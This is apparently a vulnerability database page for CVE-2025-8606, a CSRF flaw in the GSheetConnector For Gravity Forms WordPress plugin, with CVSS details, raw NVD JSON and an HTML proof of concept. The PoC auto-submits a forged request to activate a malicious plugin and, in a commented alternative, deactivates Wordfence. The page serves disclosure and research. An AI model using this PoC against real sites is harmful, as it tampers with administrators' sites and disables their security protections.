Security Vulnerability Report
中文
CVE-2025-8606 CVSS 2.4 LOW

CVE-2025-8606

Published: 2025-10-11 10:15:44
Last Modified: 2026-04-15 00:35:42

Description

The GSheetConnector For Gravity Forms plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions less than, or equal to, 1.3.23. This is due to missing or incorrect nonce validation on the activate_plugin and deactivate_plugin functions. This makes it possible for attackers to trick authenticated administrators into activating or deactivating specified plugins via a forged request, such as clicking on a malicious link or visiting a compromised page.

CVSS Details

CVSS Score
2.4
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

GSheetConnector For Gravity Forms < 1.3.23
GSheetConnector For Gravity Forms <= 1.3.23

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-8606 --> <!-- This PoC demonstrates how to exploit the missing nonce validation in activate_plugin function --> <html> <head> <title>CVE-2025-8606 - CSRF PoC</title> </head> <body> <h1>CVE-2025-8606 CSRF Exploit</h1> <!-- Auto-submitting form to activate a malicious plugin via CSRF --> <form id="csrf-form" action="https://target-wordpress-site.com/wp-admin/admin.php" method="POST"> <input type="hidden" name="action" value="activate_plugin" /> <input type="hidden" name="plugin" value="malicious-plugin/malicious-plugin.php" /> <!-- No nonce field included - this is the vulnerability --> </form> <script> // Auto-submit the form when the page loads document.getElementById('csrf-form').submit(); </script> <!-- Alternative: Deactivate a security plugin via image tag --> <!-- <img src="https://target-wordpress-site.com/wp-admin/admin.php?action=deactivate_plugin&plugin=wordfence/wordfence.php" /> --> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-8606", "sourceIdentifier": "[email protected]", "published": "2025-10-11T10:15:44.297", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The GSheetConnector For Gravity Forms plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions less than, or equal to, 1.3.23. This is due to missing or incorrect nonce validation on the activate_plugin and deactivate_plugin functions. This makes it possible for attackers to trick authenticated administrators into activating or deactivating specified plugins via a forged request, such as clicking on a malicious link or visiting a compromised page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/gsheetconnector-gravity-forms/tags/1.3.23/includes/class-gravityform-gs-service.php#L154", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/gsheetconnector-gravity-forms/tags/1.3.23/includes/class-gravityform-gs-service.php#L39", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3339653", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d5c48de7-20f6-408e-b4fb-f3d5d7ab272f?source=cve", "source": "[email protected]"}]}}